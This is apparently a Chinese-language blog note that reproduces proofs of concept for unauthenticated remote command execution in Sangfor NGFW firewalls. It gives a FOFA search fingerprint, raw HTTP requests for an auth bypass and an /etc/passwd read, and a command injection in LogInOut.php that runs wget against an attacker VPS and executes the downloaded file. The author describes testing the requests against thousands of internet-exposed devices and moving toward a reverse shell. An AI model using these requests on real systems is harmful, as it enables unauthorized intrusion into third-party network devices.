sxf - ngfw - rce
This_is_Y Lv6

原文地址:https://labs.watchtowr.com/yet-more-unauth-remote-command-execution-vulns-in-firewalls-sangfor-edition/

fofa指纹:”Redirect.php?url=/LogInOut.php” && port=”85”

image-20231009151045689

POC1

1
2
3
4
5
GET /index.php HTTP/1.1
Host: xxx.xxx.xxx.xxx:85
Content-Length: asdf


关键点在与Content-Length: asdf,如果返回413,则可能存在问题,我从fofa中提取了10000个ip,只有500多个有这个特征,需要注意的是,如果使用burp验证,需要在上面的Repeater菜单栏中,把Update Content-Length取消

image-20231009151127329

image-20231009151426357

POC2

1
2
3
4
5
GET /vmp_getinfo  HTTP/1.1
Host: xxx.xxx.xxx.xxx:85
y-forwarded-for: 127.0.0.1


验证失败,本来应该是这样的

image-20231009151709308

但是我跑了这么多ip,一个都没成功

POC3

1
2
3
4
5
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host: xxx.xxx.xxx.xxx:85
x-forwarded-for: 127.0.0.1


同上,这个也失败了,文章中是可以读文件的

image-20231009152816862

POC4

1
2
3
4
5
6
7
8
POST /LogInOut.php HTTP/1.1
Host: xxx.xxx.xxx.xxx:85
Cookie: PHPSESSID=2e01d2ji93utnsb5abrcm780c2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close
Content-Length: 622

type=logged&un=watchTowr;wget%20http://vps:8888/cmd.txt;source%20/virus/dcweb/webapps/cmd.txt&up=0f2df0a6f151e836c8ccd1c2ea3bfbdfb7bfa0d38d438942492bd8f28f3e92939319f932f2f2add6d0d484accdc4c28269b203c4dc77c1da941fa19dae017d44d6ea8cad2572e37c485a8ebcb4bdb510cc86420a50ae45ae07daf5fe9c40fe133f3806cd8f3158ee359766e8e19c9fbbf7e888bf0d7f3952f4d083bd17cd19eb960dadec2835f6f259616f5b2e5942d3a4d1754cbd69696fae60ef18358bf5782dd5ebf377f5642e0583e630660ccac241a615ae21bfc12852a32d0367a899eb010e5d1c33669fc2e9ea3a0ecbf078c22120196a115b4038288063bf99610d3d331acb53e5c8fbd14229a4abdff83cf075a7b97a9bb9dae3586f19256f4262d5

image-20231009152709691

这个本来也差点全失败了,burp的HTTP Response没有回显,返回在打算关掉窗口时,看了一眼shell窗口,发现居然有信息

image-20231009152629901

又测试了一下dnslog,可以

image-20231009154542328

接下来测试一下反弹shell

 Comments